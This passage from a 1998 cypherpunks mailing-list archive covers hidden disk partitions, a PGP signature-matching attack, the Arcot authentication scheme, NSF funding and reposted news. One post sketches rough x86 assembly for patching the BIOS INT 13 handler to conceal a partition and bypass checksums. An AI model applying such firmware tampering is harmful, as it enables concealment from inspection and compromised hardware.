BIOSes for the features in their new notebooks, with hardware variations and 
imperfection, with different power levels of batteries, different PC cards
installed, different CPU speeds, different options and other inconsistencies
you get a very difficult situation.  

Your speculation that someone out there will tempest scan to see if you've
modded your notebook is silly.  Are you just pissing against the wind, or do
you have knowledge that they actually do this?

You're forgetting your threat model and planning for a level that's beyond
demented paranoia.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 22 Sep 1998 19:21:57 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (99% noise) Stego-empty hard drives... (fwd)
Message-ID: <199809230049.TAA07693@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 22 Sep 1998 19:45:34 -0400
> From: Sunder <sunder@brainlink.com>
> Subject: Re: (99% noise) Stego-empty hard drives... (fwd)

> Jim Choate wrote:
> 
> > Consider that at any given time there are only a few hundred BIOS'es, made
> > from a few dozen base images, driving all the machines out there. The number
> > of companies that develop their own BIOS in toto for in-house products is next
> > to nil (I know of none). What they do is buy a license and then re-write the
> > sections they need to.
> 
> See: http://www.ping.be/bios/ for bioses and flash upgrades.

Ok, so I went and looked. That particular page covers ONLY Award and AMI
BIOS's. Every one of those *thousands* of machines have a BIOS which is
about 90% cherry and built from only a few dozen base builds.

It actualy supports my premise that despite the thousands of machines the
base BIOS images that drive them are really not that large.

> Come on guys, this is silly. Why the fuck would the UK tempest scan your 
> notebooks?  Manufacturers produce new machines every month, each with modified
> BIOSes for the features in their new notebooks, with hardware variations and 
> imperfection, with different power levels of batteries, different PC cards
> installed, different CPU speeds, different options and other inconsistencies
> you get a very difficult situation.  

And everyone one of them available publicly. You seriously think it's harder
to keep up with the number of BIOS'es out there than say tracking the
number of international phone calls in a year?

> Your speculation that someone out there will tempest scan to see if you've
> modded your notebook is silly.  Are you just pissing against the wind, or do
> you have knowledge that they actually do this?

Not if it is only one or two, if it becomes a serious issue you bet they'll
do it in a heartbeat.

> You're forgetting your threat model and planning for a level that's beyond
> demented paranoia.

Your absolutely correct, they are paranoid.


    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 22 Sep 1998 18:16:32 +0800
To: cypherpunks@cyberpass.net
Subject: pgpacket bug (Re: CHALLENGE? Toto/signature attack w. unpublished public key)
In-Reply-To: <199809220108.DAA07731@replay.com>
Message-ID: <199809221857.TAA11080@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Anonymous writes:
> This value is wrong: it has 3 bytes of 0's inserted and is therefore
> missing the last three bytes of the signature.
> 
> s =   0x08F4D5CBC10063725B206F787EB7370BBD0C5B4854CE79A9007D1801AEAEE6E6
>         D2C68D7EDF877FECE1FA539D08BEC54BD152BA05113951E8A84CDECAD2CB8E7A
>         C28BE916570BA7BB9C00C64DF57113C4AE81613BD351541523CD3A028FBF220E
>         F7469BD4175302DCB5B6E886974877F28A2D301433AFFFE26081008BFF687B37
> 
> 
> Here is the correct value, from the signed message.
> 
> 08F4D5CBC10063725B206F787EB7370BBD0C5B4854CE79A97D1801AEAEE6E6D2
> C68D7EDF877FECE1FA539D08BEC54BD152BA05113951E8A84CDECAD2CB8E7AC2
> 8BE916570BA7BB9CC64DF57113C4AE81613BD351541523CD3A028FBF220EF746
> 9BD4175302DCB5B6E886974877F28A2D301433AFFFE260818BFF687B37DE8167

Hmm!  That explains this output of pgpacket which I had already
forwarded to Mark Shoulson as a bug in pgpacket:

% pgpacket < totopost.asc
---------------------------
Packet Type:    Secret-Key Encrypted Packet (signature)
Length: 149
Version:        3
Adding 5 bytes of header to digest
Signature of canonical text document
Signature Created:      9 Dec 1997  21:29:02
Signing Key ID: 0xCE56A4072541C535
Public Key Algorithm:   1 (RSA)
Message Digest Algorithm:       1 (MD5)
Check bytes:    0x5A82
128 bytes of data (1)
Data:   08F4D5CBC10063725B206F787EB7370BBD0C5B4854CE79A9007D1801AEAEE6E6D2C68D7E
DF877FECE1FA539D08BEC54BD152BA05113951E8A84CDECAD2CB8E7AC28BE916570BA7BB9C00C64D
F57113C4AE81613BD351541523CD3A028FBF220EF7469BD4175302DCB5B6E886974877F28A2D3014
33AFFFE26081008BFF687B37

---------------------------
Packet Type:    UNKNOWN PACKET!! (36)
Length: 129
(No handler known.  Skipping 1 bytes)
Data:   0x67

I couldn't figure out what the spurious packet was about, you just
solved that one... pgpacket is inserting spurious 00s in the message.
(I've Cc'ed Mark Shoulson).

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 22 Sep 1998 18:15:23 +0800
To: ravage@einstein.ssz.com
Subject: respect due to anonymous (Re: CHALLENGE response (fwd))
In-Reply-To: <199809221539.KAA04070@einstein.ssz.com>
Message-ID: <199809221920.UAA11110@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate writes:
> Anonmous writes:
> > Subject: CHALLENGE response (fwd)
> 
> > The whole point of the CHALLENGE response went straight over his head,
> > didn't it? 
> 
> It didn't go over my head at all. What amazes me is that it took you this
> long to figure out that one could munge signatures.

Munge signatures!?  He generated an RSA key pair to match the
pre-published signature based on generating primes of special form
and/or using multiple smaller primes to construct an n which he could
perform discrete logs in (plus a dead beef attack), and all you can
say is the above.  You should take you hat off to anonymous.

> > No longer can you assume that just because you posted a signed message
> > on a certain date, and you hold the public key which signed that message,
> > that you can later prove authorship.  It challenges some of the implicit
> > assumptions which have been made in using public key cryptography.
> 
> No, it challenges basic assumptions regarding the importance of identity.
> In no way does it effect the basic math of crypto, public or otherwise.

It affects crypto: it means that one published signature is
not sufficient to provide a provable relationship between a signed
message and a public key.  You have to provide two signatures.

For example anonymous provide three signatures which check with that
key (one is self sig on the key).  Therefore it is not possible for
someone to do the same attack again against his published signatures:
they could match any one of the signatures, but no more.

It may even be that there exist crypto protocols affected by this.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 22 Sep 1998 13:22:23 +0800
To: cryptography@c2.net
Subject: Re: ArcotSign
Message-ID: <199809221821.UAA24448@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Greg Broiles writes:
> I'm certainly not a cryptographer, but I'm somewhat at a loss in trying to
> understand the purpose of using public-key (or asymmetric key)
> cryptography within a policy/technology system which won't allow the use
> of the strengths of asymmetric key crypto. As I understand the paper you
> reference above, to implement this system the public key must be kept
> confidential, and signed documents must also be kept confidential, or the
> system of the security as a whole is at risk. With those constraints, why
> bother with the overhead (computationally/technically/legally) of
> asymmetric key crypto at all? 

Based on http://www.arcot.com/camo2.html, the idea is to defend against
an attacker who manages to steal a copy of the secret key file, and who
then tries to guess the passphrase which protects it.  The file data
is encrypted in an unstructured generic manner so that all decryptions
look like random data, even the correct one.  This gives the attacker
no information about when he has guessed the correct passphrase.

For this to work, the public key has to be kept secret(!).  Otherwise the
right passphrase could be discovered by testing the decrypted private key
against the public key.  Arcot suggests that this would be appropriate
for an environment where only one or a few trusted servers need to
authenticate users.  These servers would be the only ones which have
copies of the public keys.  (It is not necessary that signed documents be
kept confidential, however a randomized signing algorithm must be used.)

As Greg points out, much the same could be accomplished simply by having
the servers share secret 3DES keys with their users, each user having his
own private 3DES key.  The users could encrypt messages using their 3DES
key and the server would decrypt using the appropriate key, which would
also serve to authenticate the user.

The Arcot people suggest that an advantage over this scheme is that
servers don't have to store information on all clients.  But much the same
thing could be done with symmetric cryptography.  In the Arcot system,
the client sends his public key certificate, encrypted to the server,
along with his request.  The server receives the cert and uses it to
verify/decrypt the message.  With symmetric cryptography, the client
could have the shared 3DES key encrypted using the server's public key,
and send that along with his message in a similar way.

The confusing thing about the Arcot system is this: how sensitive is the
public key?  Is it as sensitive as a shared secret key?  Superficially
not, since in order to exploit the public key you also have to steal the
private key file and then guess the passphrase.  But on the other hand,
if this is more than security through obscurity, you have to treat
it in many ways as equally sensitive.  Users of the Arcot system,
believing that they are safe because their public keys are secret,
may become casual about revealing their private key files and choosing
easy to guess passphrases.  They might even send the files around via
insecure channels.  With this kind of usage, the public key does become
just as sensitive as a shared secret key would be.

In that case, not only the servers, but all parts of the PKI must be
brought inside the trust boundary.  They are all holding material which,
if revealed, would compromise the security around which the system
is built.  You end up with trust relationships more similar to those in
a system like Kerberos than in a normal PKI.

> Is it really necessary/useful to call the scheme "software smart cards"?
> If it were called "An improved system for user authentication", I don't
> think it would make people nearly so suspicious. From my perspective, one
> of the advantages of smart card technology is that I can carry my
> authentication material with me; a system which puts it on my hard disk is
> less attractive. Floppies are portable, but not durable. 

The analogy with smart cards is that these cards protect your private key.
With a perfect smart card, an attacker can't do any better than chance
guessing of your private key.  With the Arcot system, the same is true.
Decrypting the private key file gives no information about its content,
because pure random data is encrypted.  Therefore with their system the
attacker also can't do better than chance guessing.

However this ignores the cost of the system, discarding many of the
advantages of public key cryptography.  You don't have to do that if you
use smart cards.

> I didn't understand the relationship between this scheme and Rivest's
> chaffing and winnowing which you note was cited as a reference in the SSC
> paper - would you (or someone else) mind explaining the connection?

Yes, this seems obscure.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sunder <sunder@brainlink.com>
Date: Tue, 22 Sep 1998 19:32:39 +0800
To: Jim Choate <ravage@einstein.ssz.com>
Subject: Re: Stego-empty hard drives... (fwd)
In-Reply-To: <199809221938.OAA06031@einstein.ssz.com>
Message-ID: <360840E8.7C1AC239@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Choate wrote:

> We're not discussin stego, we're discussing hidden disk partitions, not
> hiding data in the lsb of of existing observable disk partitions or
> something similar.

Steganography is the art of hiding data.  Hiding disk partions IMHO falls
under this.  Hiding data in the LSBits of bytes is only an EXAMPLE of stego, it
doesn't define stego.  Even the subject of this message says Stego Empty hard
drives conforming to this definition.
 
> > Who the fuck is gonna run a tempest scanner on your notebook again?  Let's
> 
> Considering the cost of such a scanner (a few $10k/ea.) and assuming such
> masking technology were to become commen place I doubt if very many
> customs checkpoints at major transfer hubs wouldn't have them.

Why would they implement it when they can simply have their software scan the
BIOS code if that's what they feared?  It may cost them $10k each, but it'll
cost them millions to design and scan every notebook type on the planet, and
then they'll have to get their hands on newer models as soon as they hit the
market.  You're talking about a project that's bigger in magnitude than the
NSA.
 
> > Why would you need to collect BIOSes?  You only need to modify a single BIOS -
> > the one on >YOUR< notebook.  The camouflage code would be a few hundred bytes
> > at most unless you do something overly elaborate.
> 
> I suspect it would be several k actualy since it is going to have to
> include the encryption code, device drivers, wedgers, etc.

Why should YOUR BIOS need to contain encryption code or device drivers for that
matter?  All it needs to do is to HIDE the existance of the extra partition. 
You modify every INT 13 functions to look for the track number being beyond a
certain value.  As rusty and as fucked as my x86 code is this shows the general
idea:

You patch your BIOS by replacing a few bytes of code with CALL's and NOP's. 
Maybe 4-8 bytes at most to modify.  The routine that checks for the track range
is only several bytes:


Somehwere in INT13 code:
            blah
            blah
            blah
            CALL biospatch
            NOP ; to fill in the overwritten code to the next opcode


biospatch  PUSH AX         ;save the register if you need it
           MOV AX,switch   ;get the value of the hack switch switch
           JE  popbye
           POP AX
           CMP AX,1234 ;or whatever register or whatever value
           JLE bye
deny       MOV AL,FAIL ;some reg and some value that says error, likely AL
           RET
           
popbye     POP AX
bye        ;insert the code that you overwrote with your CALL to this patch
re           
           RET


Homework: Someone please take this code, optimize it for size and build a TSR
patching INT 13 that JIM can install and run under DOS.

Whoop... that takes less than 25 bytes of code to implement for each of the INT
13 functions.  If you don't believe me, run debug and type in some similar
code.  All it needs to do is to check if the hack is in place, if so, check the
cylinder/track # being accessed.  If it's bigger than your limit, return an
error, otherwise allow it.  Where's the big fucking several K of code there?

A few more lines of code to implement the hidden switch code and you're set. 
Maybe modify the routine that checks for ESC to skip the memory check or DEL to
enter the setup, what another 25 byte patch?

Once you find out where the bios does it's checksum, you NOP that entire
section out, or recalculate the checksum yourself if you want to be anal. This
doesn't add any extra bytes.

Or if you're truly insanly paranoid, modify the bios password routine so that
if you type in a certain password it toggles the hacked mode on or off.  Maybe
a 100 byte patch at most.

> A disassembler isn't a a debugger. All a disassembler does is convert the
> hex to symbols (see frankenstein for an excellent design).

Semantics.  I can use debug to disassemble a ROM bios and trace through it.  It
does the fucking job.  Sure, it doesn't translate symbols or do anything fancy,
but it's enough to do what >THIS< project requires.
  
> > One thing all you fine folks are forgetting is that there are MANY types
> > of notebooks out there.
> 
> With only a few dozen BIOS'es driving the whole kit and kaboodle.

Yeah, and each of those hundreds of types of notebooks have their own MODIFIED
BIOSES with various patches and flash updates.  Good luck collecting a copy of
EVERY version of EVERY bios for EVERY brand of notebook made in various
countries with various languages, options, and other permutations.
 
> They're new, they will learn from their mistakes and it won't take long.
> After all, they have your tax dollars to use...

Yeah, yeah, yeah, next thing you'll tell me is that they'll start to stick
people in MRI machines to scan for drugs.  Sure, you can do whatever you like
if you've got infinite resources.  Show me someone who does.

Look if your threat model is some bloke in an airport with a shrink wrapped
floppy, even a shit solution will fool him.  If your threat model is ten orders
of magnitude more fascist, then they very likely won't even let you carry a
notebook.

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|       Sunder       |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Tue, 22 Sep 1998 22:30:04 +0800
To: cypherpunks@cyberpass.net
Subject: NSF grants to Internet at risk)
Message-ID: <Pine.GSO.3.95.980922203128.20778E-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain





---------- Forwarded message ----------
Date: Tue, 22 Sep 1998 20:28:31 -0700 (PDT)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: NSF grants to Internet at risk

[Seems to me that this dispute involves two perils: class action suits and
government funding of technology that can be easily paid for by the
private sector. I mean, it's not like the world's corporations hasn't
figured out the Internet is important. Besides, government funding often
means greater control. Early on in public broadcasting, the government
barred TV stations from editorializing. Currently government grants to
community radio stations don't go to ones with eclectic and thus probably
more interesting programming -- which need the cash the most. And remember
that Senate encryption bill that basically said government-funded networks
must use key escrow? Obviously the details of the suit and the fund are
important here, but the broader point is worth keeping in mind. --Declan]


---------- Forwarded message ----------
Date: Tue, 22 Sep 1998 20:40:17 -0400
From: David Lytel <david@lytel.com>
To: Declan McCullagh <declan@well.com>
Subject: Fwd: URGENT breaking news: Internet funding crisis

[personal note snipped. --dbm]

Internet Funding Crisis: A Call to Action for CyberCitizens

For more information call David Lytel of Sherpa Consulting Group at
1-315-473-8996 or 1-888-GUIDING 

Unknown to the rest of the world, Senate Majority Leader Trent Lott is
engaged in an effort to remove millions of dollars from the budget of the
National Science Foundation (NSF) that the Congress has previously made
available to invest in new Internet technologies.  Lott is trying to repeal
action earlier this year that ratified the Internet Intellectual
Infrastructure Fund as a congressionally authorized tax on the registration
of Internet domain names.  This was necessary because of a lawsuit brought
against Network Solutions, Inc., which has been acting as a domain
registration authority for the Internet under a cooperative agreement with
the NSF. 

In Thomas v. Network Solutions, Inc., 1998 WL 191205, US District Court
Judge Hogan ruled that the domain name registration fee was an unauthorized
tax.  Based on Congress's belated ratification of the fee (in the VA/HUD
Supplemental Appropriation bill earlier this year), Hogan ruled that it was
authorized.  This issue is being appealed to the United States Court of
Appeals for the DC Circuit.  Regardless of the outcome of the Lott
amendment, this means that the DC Circuit will consider the lawfulness of
the fund.  

Lott's maneuver is to add the repeal of the ratification to the Internet
Tax Freedom Act, which has passed the House and may reach the floor as
early as this week.  In the Senate, the Internet Tax Freedom Act has passed
both the Commerce and the Finance Committees without the change, but Lott
is circulating a draft managers amendment that would repeal the ratification.

What is at stake:

At stake is about $60 million that the NSF would no longer have available
to invest in research and development of high speed networks and
bandwidth-intensive applications.  If this is settled in the courts, about
$15 million would go to the attorney for the plaintiffs and most of the
rest would be lost to administrative fees as Network Solutions finds ways
to make rebates people who have registered domain names.  The payoff to
individual domain holders would be only a few dollars.  The NSF would lose
funds that are supposed to be available to aid universities as they upgrade
their connections from today's commodity Internet connections to tomorrow's
Internet 2 level connections.  For the commercial Internet, this means that
advanced research on different approaches relieve Internet congestion will
be slowed or stopped.  

The NSF funds experimental networks that address the fundamental problem of
traffic congestion on today's Internet.  The problem goes beyond the
limitations of access technologies such as today's modems or even access
technologies such as ISDN.  There are segments of what are supposed to be
the Internet's high speed corridors that are significantly blocked during
periods of peak use.  Part of the solution is building more and bigger
pipes to carry Internet traffic.  But it is also quite likely that demand
is growing quickly enough to fill much of this capacity.  The Internet
traffic problem is not unlike the automobile traffic problem in our major
cities in the 1960s, when no matter how many new bridges and highways we
built we never managed to get ourselves out of a traffic jam.


This is why a significant part of the Internet's original academic
pioneers are experimenting with new technologies to separate and prioritize
Internet traffic.  The Internet's underlying technologies are designed to
implement what is called a "best effort" level of servicemeaning that if
packets cannot be delivered the Internet keeps trying to send them for
three days before giving up.  Just as HOV (high occupancy vehicle) lanes
have been part of the solution to the problem of highway traffic,
tomorrow's Internet will support quality-of-service or QoS distinctions so
that the bits containing an MRI moving between a primary care physician and
a specialist are given the priority they deserve over more playful uses of
the Internet.  While industry is addressing the problem of congestion in
various ways, it is often the university research community that produces
the innovative solutions that no one has yet thought of.

This ability to prioritize packets, in conjunction with the ability to
reserve bandwidth in advance rather than just hoping for the best, may be
the foundation of tomorrow's multimedia Internet.  With the right
underlying technologies, tomorrow's Internet will handle voice and video
services with greater ease than it handles email and Web pages today.  Some
of the next generation of Internet success stories will once again come
from the networking laboratories of university-based researchers. 

Who is behind this:

The driving force behind the lawsuit is Attorney William Bode in Washington
(202-862-4300) on behalf of a client called the American Internet
Registrants Association.  If Lott is successful the ratification will be
repealed and the lawsuit will be settled in favor of the plaintiffs.
Although it is not yet possible to link Bode to Senator Lott's actions, a
search of the Federal Election Commission's campaign contributors on the
Center for Responsive Politics site (www.crp.org) reveals Bode as an active
financial supporter of the Republican National Committee, former Senator
Bob Dole, and Senator Mitch McConnell (R-KY), who is chair of the
Republican Senatorial Campaign Committee.  

What CyberCitizens can do:

The most important members of the Senate to contact are Lott, Senator
William Roth (R-DE, chair of the Finance Committee) and Senator John McCain
(R-AZ) chair of the Senate Commerce Committee and the bill's Republican
floor manager).  It is also useful to contact the Democratic floor manager,
Senator Byron Dorgan (D-ND).  A staffer in the office of Senator Ron Wyden
(D-OR), who has sponsored the Internet Tax Freedom Act, says Wyden will not
make any effort to get the objectionable amendment removed, saying "we do
not have a dog in that fight."  Others worth contacting are Finance
Committee members Senator Al D'Amato and Senator Daniel Patrick Moynihan
from New York, the state with the highest number of 4 year, Ph.D.-granting
institutions and the highest number of students at 4 year schools, who
would benefit from the NSF funding.  Their e-mail addresses:

Senator Trent Lott (R-MS)  senatorlott@lott.senate.gov or fax 202-224-2262
Senator William Roth (R-DE) comments@roth.senate.gov

Senator John McCain (R-AZ)  senator_mccain@mccain.senate.gov
Senator Byron Dorgan (D-ND) senator@dorgan.senate.gov
Senator Alphonse D'Amato (R-NY) senator_al@damato.senate.gov
Senator Daniel Patrick Moynihan (D-NY) senator@dpm.senate.gov
Senator Ron Wyden (D-OR) senator@wyden.senate.gov

In addition, universities, Internet industry associations and companies
should consider supporting Network Solutions in its legal battle over the
lawfulness of the Internet Intellectual Infrastructure fund.  If any group
or individual is interested in filing an amicus brief in support of the
lawfulness of the registration fee, they should contact Mark Davies at
mdavies@mayerbrown.com for more details.

For more on the Internet domain name controversy see the Domain Name
Handbook at www.domainhandbook.com

Others who could be interviewed include:

Joel Widder, Deputy Director of the NSF's Office of Legislative and Public
Affairs at 703-306-1070 or jwidder@nsf.gov
Tony Rutkowski, formerly Executive Director of the Internet Society and now
head of the independent Center for the Next Generation Internet
(www.ngi.org) at 703-437-9236 or amr@ngi.org
Howard Sartori (202-917-2935), president of the American Internet
Registrant's Association (www.aira.org or 202-862-4363)
Gabe Battista 703-742-4842) president of Network Solutions, Inc.
(www.netsol.com or 703-742-0400)

**version 1.2
**end
 
new address: 	5 Brattle Road
				Syracuse, NY 13203-2803

				315-473-8996







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 22 Sep 1998 22:39:52 +0800
To: cypherpunks@cyberpass.net
Subject: IP: US Easing Bank Rules on Big Cash Transactions
Message-ID: <199809230341.UAA07098@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: IP: US Easing Bank Rules on Big Cash Transactions
Date: Mon, 05 May 1997 15:44:45 -0500
To: believer@telepath.com

Source:  New York Times
http://www.nytimes.com/yr/mo/day/news/financial/cash-transactions-reuters.html

September 22, 1998

U.S. Is Easing Bank Rules on Big Cash Transactions 

By REUTERS

WASHINGTON -- The Treasury Department announced Monday
that it was trimming its requirements for reporting large cash
transactions. The measures had been introduced to try to curb money
laundering. 

Banks had criticized the requirements, the Treasury said, "because they
mandated repetitive paperwork" for routine transactions. The changes
will lighten the banks' paperwork load but will make bankers responsible
for acting as monitors and reporting anything to the authorities that they
think is out of the ordinary and that might indicate criminal activity. 

The new rules will permit banks to conduct most transactions with "cash
intensive businesses" without having to report to the Government under
the 1970 Bank Secrecy Act. But banks will still have to file reports on
transactions of $10,000 or more with individuals and with certain types
of businesses. 

"This rule does not exempt banks from reporting suspicious activity
involving those exempted activities," the Treasury said. "In addition,
certain categories of businesses, such as real estate brokers, automobile
dealers and money transmitters, may not be exempted." 

The reporting requirements were originally established to help law
enforcement officials combat money-laundering by drug dealers and
other criminals who pass large amounts through businesses and banks to
give an appearance of legality. 

The new rules, published today in The Federal Register, will permit a
bank to exempt a domestic business that routinely needs large amounts of
cash simply by filing a form stating that the business is exempt. The
business must have been a customer of the bank for at least a year. 

Banks, savings institutions and credit unions can begin using the new rules
on Oct. 21. 

The Treasury said businesses exempted from reporting rules by a bank
must have their exemptions reviewed every two years. But it said it was
dropping a requirement that banks include details about all of a
customer's transactions on the renewal form. 

In 1997, the Treasury said, more than 12 million currency transaction
reports were filed. It said that as a result of the latest rules changes, as
well as an earlier streamlining of reporting requirements for transactions
between banks, financial institutions should be able to reduce such filings
by about 30 percent. 

 Copyright 1998 The New York Times Company
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 22 Sep 1998 22:40:55 +0800
To: cypherpunks@cyberpass.net
Subject: Key Goal for UN: Accelerating Fight Against Terrorism
Message-ID: <199809230341.UAA07112@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




From: believer@telepath.com
Subject: Key Goal for UN: Accelerating Fight Against Terrorism
Date: Mon, 21 Sep 1998 15:48:01 -0500
To: believer@telepath.com

Source:  USIA
http://www.usia.gov/current/news/latest/98092101.plt.html?/products/washfile
/newsitem.shtml

21 September 1998 

KEY U.S. GOAL FOR UNGA: ACCELERATING FIGHT AGAINST
TERRORISM 

(Ambassador Burleigh cites U.S. priorities for 53rd UNGA) (1110)
By Judy Aita
USIA United Nations Correspondent

United Nations -- Emphasizing the Clinton administration's "full
measure of support" for the United Nations, the chief U.S. delegate to
the 53rd General Assembly said that U.S. priorities include furthering
international cooperation against weapons proliferation, terrorism,
and international crime.

Ambassador A. Peter Burleigh, head of the U.S. Mission to the United
Nations, said, "We face in the 53rd session of the General Assembly a
crucial agenda of work, in a year of crucial significance for the
United States and its relationship with the world body, and at a time
when it is more imperative than ever for nations of the world to face
united the threats to our common economic, political, social, and
environmental security."

"The UN provides political and economic options benefiting Americans
in the form of a safer, more prosperous world, and at a savings
through collective cost-sharing rather than unilateral burdensharing,"
he said at a press conference September 18.

"We are convinced that by remaining engaged in the UN we promote vital
American leadership, and reflect the depth of quiet support felt for
the UN among the American people," Burleigh said.

The General Assembly began September 9 overshadowed by crisis
situations around world: the nuclear tests conducted by India and
Pakistan in May, terrorist bombings at U.S. embassies in Kenya and
Tanzania, growing tension between Iran and Afghanistan, Iraq's refusal
to cooperate with UN weapons inspectors, and continued fighting in the
Democratic Republic of the Congo.

Citing the terrorist bombings in Nairobi and Tanzania and U.S. efforts
to bring to trial two Libyan suspects in the Pan Am bombing almost 10
years ago, Burleigh said "the U.S. and UN are engaged in a struggle
against international terrorism. Our weapon of choice is international
cooperation."

"Our policy is this: No deals with terrorists, bring terrorists to
justice, and pressure states that sponsor and harbor them," he said.

Burleigh noted that the United States remains committed to UN reform,
which has been a major U.S. concern for several years.

"Progress is occurring," the ambassador said. "The UN has cut its
budget and staff, established an inspector general's office, and
strengthened both peacekeeping and administrative operations. The
secretary general's reform initiatives, endorsed by the General
Assembly, are in large part the same as our own goals and will
substantially improve the efficiency and effectiveness of the UN
system."

Ironically, during the 53rd UNGA session, the United States could lose
its voting rights unless the U.S. Congress appropriates the funds
requested by the Clinton administration for UN dues.

According to Article 19 of the UN Charter, any UN member that owes two
years' annual dues loses its voting rights in the assembly. As of
August 31, 1998, the United States owed the United Nations more than
$1,600 million. Of that, $572 million is for the regular budget;
$1,041 million for peacekeeping; and $2.8 million for the
international tribunals. In January the U.S. 1999 assessment of $297.7
million will be due.

"Article 19 does not affect our participation in the Security Council
or other UN bodies and it does not alter our joint agenda for the
coming UNGA session," the ambassador said. The US delegation will
pursue a "vigorous, active agenda," he stressed.

"We were disappointed this year that the legislation passed by
Congress to enable the U.S. to pay its UN arrears included provisions
on international family planning that were totally unacceptable to the
(Clinton) administration," Burleigh said.

"The president has repeatedly voiced his determination that the U.S.
must start repaying its UN arrears," the ambassador said.

"I don't think Congress wants to see a situation where the U.S. loses
its vote," he added. "We hope before adjourning in October Congress
will appropriate the funds. The president and secretary of state are
actively lobbying to make that happen."

President Clinton will be one of more than 30 heads of state or
government who will be addressing the assembly during its traditional
two-week general debate, which begins on September 21.

Burleigh pointed to the president's recent speech on global economic
challenges to the Council on Foreign Relations as significant for
U.S.-UN work as well.

Clinton said that "at this moment of financial turmoil, we are called
upon once again to lead -- to organize the forces of a committed world
to channel unruly energy into positive channels that advance our
interest, reinforce our values, and enhance our security...Now it is
time for us to rise to our responsibility, as America has so many
times before, so that we can redeem the promise of the global economy,
and strengthen our nation for the 21st Century," Burleigh recalled.

"President Clinton's words call (upon) us too, at the start of the
UNGA, to redeem the full promise and potential of the United Nations
for the world," the ambassador said.

The assembly will deal with a wide variety of issues on its 165-item
agenda -- including human rights, arms control and disarmament, the
environment, refugees, drug trafficking, and population.

U.S. goals for the UNGA include:

-- recommitting the international community to human rights during the
celebration of the 50th anniversary of the Universal Declaration of
Human Rights;
-- convincing India and Pakistan to adhere to the Comprehensive Test
Ban Treaty and discouraging other potential nuclear weapons states
from conducting nuclear tests;
-- supporting the work of the Middle East peace negotiators to renew
momentum in the process and avoiding condemnatory resolutions of past
assemblies;
-- keeping the 1998 budget within the approved $2,533 million and
continuing more reforms; and
-- encouraging countries to meet reporting obligations under the UN
Register of Conventional Arms and the Wassenar Arrangement on
conventional and dual-use technology exports.

The Security Council also will take advantage of the large number of
top officials attending the debate to hold a ministerial-level meeting
on Africa September 24. This will continue its major initiative of
last year to focus attention on the African continent. This year the
council members, including Secretary of State Madeleine Albright, will
review Secretary General Kofi Annan's report on Africa entitled "The
Causes of Conflict and the Promotion of Durable Peace and Sustainable
Development in Africa" released in April.

In that report Annan stressed that the time is long past when the
responsibility for producing change in Africa can be shifted onto
others' shoulders. Both African nations and the international
community must "summon the political will" to end wars on the
continent, take good governance seriously, and invest in Africa's
resources, he said.
-----------------------
NOTE: In accordance with Title 17 U.S.C. section 107, this material is
distributed without profit or payment to those who have expressed a prior
interest in receiving this information for non-profit research and
educational purposes only. For more information go to:
http://www.law.cornell.edu/uscode/17/107.shtml
-----------------------




**********************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address
**********************************************
www.telepath.com/believer
**********************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Tue, 22 Sep 1998 20:55:15 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
